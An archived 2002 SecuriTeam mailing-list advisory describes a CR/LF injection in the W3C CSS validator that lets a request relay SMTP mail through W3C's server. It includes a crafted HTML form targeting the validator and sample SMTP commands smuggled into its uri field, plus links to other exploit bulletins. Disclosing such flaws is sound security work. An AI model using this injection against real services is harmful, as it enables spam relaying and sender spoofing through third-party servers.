[NEWS] W3C CSS Validator - Proxying Attack

From: support@securiteam.com
Date: 09/16/02


From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 16 Sep 2002 15:11:54 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  W3C CSS Validator - Proxying Attack
------------------------------------------------------------------------

SUMMARY

As we reported previously a vulnerability exists in the W3C HTML validator
that allows for cross-site scripting. The following shows a different
issue, where additional CR/LF (Carriage Return/Line Feed) can be inserted
into the FORM an attacker fills allowing him for example to send an email
through a third party site while masquerading as someone coming from W3C's
site (i.e. relaying through it).

DETAILS

Another vulnerability at the W3C, this time the CSS validator. A Cr/Lf
injection can be performed by creating a custom form:

<FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator">
<INPUT TYPE="hidden" NAME="warning" VALUE="1">
<INPUT TYPE="hidden" NAME="profile" VALUE="css2">
Commands:
<TEXTAREA STYLE="width:300px;height:300px" NAME="uri"
ONDBLCLICK="document.forms(0).submit()"></TEXTAREA>
</FORM>

And filling it in with something like:

[Begin Form]
http://mailserver:25/
HELO 127.0.0.1
MAIL FROM:me@here.com
RCPT TO:you@somewhere.com
DATA
This is a simple message demonstrating the W3 relaying hole

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [EXPL] SLMail PASS Buffer Overflow
    ... The following exploit code can be used to test your SLMail ... # Discovered by: Muts # ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] Xsun (Sparc) Local Exploit (RGB_DB)
    ... struct TREE { ... main(int argc, char *argv) ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] BSD-AirTools, WEP Related Tools
    ... netstumbler (dstumbler) that can be used to detect wireless access points ... of the prism2 debug modes as well as do basic analysis of the ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Posix_getpw* Ignores Safe_mode and Open_basedir Settings
    ... thus allowing a user to rebuild a complete ... user to know what accounts have what privileges and what accounts have ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] php(Reactor) Cross Site Scripting Vulnerability
    ... Therefore, any user may construct a malicious link, gain ... the $fid and $tid variables should be integers. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)